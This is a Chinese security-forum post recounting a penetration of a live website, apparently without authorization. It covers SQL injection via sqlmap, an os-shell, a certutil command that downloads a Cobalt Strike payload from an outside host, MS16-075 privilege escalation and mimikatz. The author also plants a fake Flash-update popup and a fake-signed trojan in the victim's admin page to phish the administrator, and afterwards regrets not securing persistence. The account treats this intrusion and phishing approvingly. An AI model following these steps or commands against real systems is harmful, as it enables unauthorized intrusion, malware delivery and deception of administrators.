安全矩阵

 找回密码
 立即注册
搜索
查看: 5492|回复: 0

记一次渗透行动

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-2-18 22:13:15 | 显示全部楼层 |阅读模式
原文链接:记一次渗透行动

朋友们好啊,我是乱日一通————毅种循环。


几天前做的一个目标,现在已经没有价值了,把其中的过程做个记录。

朋友其实发了好几天给我了,因为忙着打2077,只能回复说

眼看着编不下去了,决定抽一天特地来看这个站。



信息收集


信息收集就那么一回事,看子域,看资产,推荐使用FOFA进行收集(好心人们谁给我嫖一个高级会员?)中途的艰辛就不说了,略。因为现在打点进去的服务都给整关了,现在截图截不到了。



打 点


我说我们这个信息收集,这只是渗透的基础,信息收集是讲方法的,谷歌百度git开源情报收集缺一不可。渗透的流程,我们都是要从最基础开始讲起,到全流程都学习…哈!

诶…我一说完他啪就演示起来了,很快啊!

然后上来就是一个登录框,吭,一边截包一边分析,感觉有SQL注入了,我全防出去了!

进入的点就是子域上的一个登录点,整了个很丑的框(目测感觉有,希望大火不要和我学习养成目测漏洞的习惯),拿sqlmap跑了一下。



大概就是这样子的,运气还不错,用的sqlserver,而且是DBA权限。
  1. [19:24:36] [INFO] the back-end DBMS is Microsoft SQL Server
  2. web server operating system: Windows 2008 R2 or 7
  3. web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
  4. back-end DBMS: Microsoft SQL Server 2014
  5. [19:24:36] [INFO] testing if current user is DBA
  6. current user is DBA: True
复制代码

DBA了就不用讲武德了,能执行os-shell就最好,在我开启os-shell之后,准备直接上个CS的马,结果意外发生了,应该是杀毒把powershell拦截了。




好,可以。


然后我就用了一种比较麻烦的方法,先把免杀马传上去再执行,用的是certutil方法。
  1. certutil.exe -urlcache -split -f http://1.1.1.1/1.exe  C:\Users\Public\1.exe
复制代码

然后:
  1. command standard output:
  2. ---
  3. ****  联机  ****
  4.   000000  ...
  5.   047a7d
  6. CertUtil: -URLCache 失败: 0x80070005 (WIN32: 5)
  7. CertUtil: 拒绝访问。
复制代码




好好好,你说什么就是什么。换个目录执行,换成了C/windwos/temp。

  1. command standard output:
  2. ---
  3. ****  联机  ****
  4.   000000  ...
  5.   047a7d
  6. CertUtil: -URLCache 命令成功完成。
  7. ---
复制代码




然后就上线了我的CS。

后渗透


已知目标2008:


阿里云的服务器,安装67个补丁

修补程序: 安装了 67 个修补程序。
  1. [01]: KB981391
  2. [02]: KB981392
  3. [03]: KB977236
  4. [04]: KB981111
  5. [05]: KB977238
  6. [06]: KB2849697
  7. [07]: KB2849696
  8. [08]: KB2841134
  9. [09]: KB2841134
  10. [10]: KB977239
  11. [11]: KB2670838
  12. [12]: KB2830477
  13. [13]: KB2592687
  14. [14]: KB3191566
  15. [15]: KB981390
  16. [16]: KB2386667
  17. [17]: KB2545698
  18. [18]: KB2547666
  19. [19]: KB2574819
  20. [20]: KB2603229
  21. [21]: KB2639308
  22. [22]: KB2667402
  23. [23]: KB2685811
  24. [24]: KB2685813
  25. [25]: KB2698365
  26. [26]: KB2729094
  27. [27]: KB2732059
  28. [28]: KB2750841
  29. [29]: KB2761217
  30. [30]: KB2809215
  31. [31]: KB2834140
  32. [32]: KB2862330
  33. [33]: KB2894844
  34. [34]: KB2900986
  35. [35]: KB2919469
  36. [36]: KB2923545
  37. [37]: KB2970228
  38. [38]: KB2984972
  39. [39]: KB3004375
  40. [40]: KB3006137
  41. [41]: KB3020369
  42. [42]: KB3020388
  43. [43]: KB3046269
  44. [44]: KB3054205
  45. [45]: KB3059317
  46. [46]: KB3068708
  47. [47]: KB3075226
  48. [48]: KB3080149
  49. [49]: KB3102429
  50. [50]: KB3118401
  51. [51]: KB3125574
  52. [52]: KB3138612
  53. [53]: KB3140245
  54. [54]: KB3156016
  55. [55]: KB3156019
  56. [56]: KB3159398
  57. [57]: KB3161949
  58. [58]: KB3161958
  59. [59]: KB3172605
  60. [60]: KB3177467
  61. [61]: KB3179573
  62. [62]: KB3181988
  63. [63]: KB3210131
  64. [64]: KB4019990
  65. [65]: KB4040980
  66. [66]: KB976902
  67. [67]: KB4038777
复制代码

用烂土豆 MS16-075提权就行了,一把梭感觉美滋滋。


还是个8G内存的服务器,不存在域环境。
看一下用户,好决定后面怎么行动。



存在三个用户,其中一个IIS Administrator guest。mimikatz没抓到管理员明文,密文也解不开。

看了一下亲爱的管理员登录时间,登录日志全是匿名登录,这直接艾斯比....

不行我得走,万一反过来把我日了。

看一下文件进程:



整的挺好,还有个迅雷。查看了一下文件的打开路径,结果没有。



然后呢,本来想钓管理员PC的,费劲心思在改了他后台页面的源码做了弹窗提示flash版本过低,我甚至连免杀马都准备好了,为了逼真还弄了个假签名。





然后嘛,记不清自己干了什么跌卵操作一时心急应该是触发了阿里云的异常报警,判断管理员把web服务给关了,自启服务也没做,权限就这样丢了,只能期待管理员会点击我的文件了。

自然是传统功夫以点到为止,因为这时间,按传统功夫的点到为止同学们已经心服口服了。如果这这一套打完,那自然是很无敌啊。



反 思


我应该早点固定权限的,阿里云异常登录就报警 连3389我都没进就给整没了。

再怎么整个注册表添加启动项啊。

我劝!你们这些年轻人耗子尾汁,好好学习,以后不要再犯我这样的聪明,小聪明,啊,学习要讲沉心静气,要讲态度,不要搞骚操作。

啊,谢谢同学们!












回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 20:46 , Processed in 0.012957 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表